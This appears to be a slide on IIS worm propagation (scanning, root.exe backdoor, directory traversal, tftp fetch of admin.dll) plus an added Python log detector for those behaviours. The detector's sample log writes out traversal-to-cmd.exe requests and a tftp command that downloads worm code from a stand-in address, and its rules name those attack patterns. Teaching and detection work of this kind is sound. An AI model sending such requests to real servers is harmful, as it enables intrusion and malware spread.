IIS Propagation
Infected system scans TCP port 80 looking for Web servers
- Most address scanning is local; random IP addresses are used ~25% of the time
When a Web server is found, attacker attempts various exploits
- sadmind vulnerability
- Code Red II root.exe or other backdoor
- IIS Directory Traversal vulnerability
Victim server obtains worm code (admin.dll) from attacker using tftp from cmd.exe
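
Added example, not part of the original slide: a small detector that tags Web server log requests matching the behaviours listed above (root.exe backdoor probe, directory traversal, cmd.exe execution, tftp fetch of admin.dll). The log layout, rule names and sample lines are assumptions constructed for illustration; repeated percent-decoding to expose double-encoded traversal goes beyond what the slide states.

```python
import re
from urllib.parse import unquote

# Constructed sample requests, "client method uri status" per line (a simplified
# layout assumed for this example; real IIS logs carry more fields).
SAMPLE_LOG = """\
192.0.2.10 GET /index.html 200
192.0.2.77 GET /scripts/root.exe?/c+dir 404
192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir 404
192.0.2.77 GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp+-i+192.0.2.77+GET+admin.dll 200
198.51.100.5 GET /downloads/cmd.exe.txt 200
"""

# Hypothetical rule names, one per behaviour listed on the slide.
RULES = {
    "backdoor-shell": re.compile(r"/root\.exe(\?|$)"),
    "traversal": re.compile(r"(^|/)\.\.(/|$)"),
    "cmd-exec": re.compile(r"/cmd\.exe(\?|$)"),
    "tftp-fetch": re.compile(r"tftp.*admin\.dll"),
}

def normalize(uri, max_rounds=3):
    """Percent-decode until stable so double encoding (%255c) is exposed."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    # Treat backslash as a path separator and compare case-insensitively.
    return uri.replace("\\", "/").lower()

def classify(uri):
    """Return the sorted rule names that match the normalized URI."""
    norm = normalize(uri)
    return sorted(name for name, rx in RULES.items() if rx.search(norm))

def scan(log_text):
    """Group flagged requests by client address."""
    hits = {}
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip lines that do not fit the assumed layout
        client, _method, uri, _status = parts
        tags = classify(uri)
        if tags:
            hits.setdefault(client, []).append((uri, tags))
    return hits

if __name__ == "__main__":
    for client, events in scan(SAMPLE_LOG).items():
        print(client, [tags for _uri, tags in events])
```

A single client that trips several of these rules in quick succession fits the sequence on the slide better than any one match alone.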